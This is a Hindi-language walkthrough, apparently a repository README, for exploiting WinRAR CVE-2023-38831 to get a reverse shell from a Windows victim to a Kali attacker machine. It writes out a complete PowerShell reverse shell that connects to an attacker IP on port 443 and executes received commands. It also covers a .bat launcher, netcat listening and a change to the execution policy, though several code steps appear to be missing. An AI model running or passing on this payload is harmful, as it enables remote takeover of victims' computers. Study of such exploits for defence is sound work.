
6.23 से पहले के संस्करणों में winrar की CVE-2023-38831 भेद्यता का शोषण करके reverse shell प्राप्त करने के लिए आवश्यक कदम
इस रिपॉजिटरी में हम winrar की CVE-2023-38831 भेद्यता का शोषण करने जा रहे हैं ताकि हम Windows पीड़ित मशीन से Kali Linux हमलावर मशीन पर reverse shell प्राप्त कर सकें।
हम इस रिपॉजिटरी की सामग्री डाउनलोड करते हैं:

इसके बाद, हमें इस भेद्यता का शोषण करने के लिए आवश्यक Python निर्भरताएँ निम्नलिखित कमांड्स के साथ स्थापित करनी होंगी:
pip install rarce

हम revshells.com वेबसाइट से प्राप्त एक दुर्भावनापूर्ण कोड निष्पादित करने जा रहे हैं जो हमें reverse shell प्रदान करेगा (संबंधित हमलावर का IP और पोर्ट प्रदान करके):

$LHOST = "192.168.0.36"; $LPORT = 443; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
हम इस powershell कोड को एक .ps1 फ़ाइल में सहेजते हैं (इसे बाद में निष्पादित किया जाएगा):

reverse shell प्राप्त करने के लिए ps1 में कोड प्राप्त करने के बाद, हम एक python फ़ाइल बनाते हैं जो os लाइब्रेरी का उपयोग करके .ps1 फ़ाइल को निष्पादित करने का कार्य करती है:

फिर, हम निम्नलिखित कोड के साथ एक .bat फ़ाइल बनाते हैं:

rem Ruta al ejecutable de Python
set PYTHON_EXECUTABLE=python.exe
rem Ruta al script de Python que deseas ejecutar
set PYTHON_SCRIPT=pwned.py
rem Ejecutar el script de Python
%PYTHON_EXECUTABLE% %PYTHON_SCRIPT%
rem Pausa para que puedas ver la salida antes de que se cierre la ventana
pause
इस बिंदु पर हमें दुर्भावनापूर्ण winrar बनाना होगा:

हम .rar के अंदर documento.pdf फ़ाइल को निष्पादित करते हैं:


अंत में, यदि हम एक हमलावर मशीन से netcat के साथ सुनते रहते हैं, तो हमें reverse shell प्राप्त हो चुकी होगी:

यदि powershell कमांड निष्पादित नहीं कर पा रहे हैं, तो हमारे सिस्टम पर स्क्रिप्ट निष्पादन सक्षम करना आवश्यक है:


हम इसे सक्षम करते हैं:

और निम्नलिखित कमांड निष्पादित करते हैं:
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser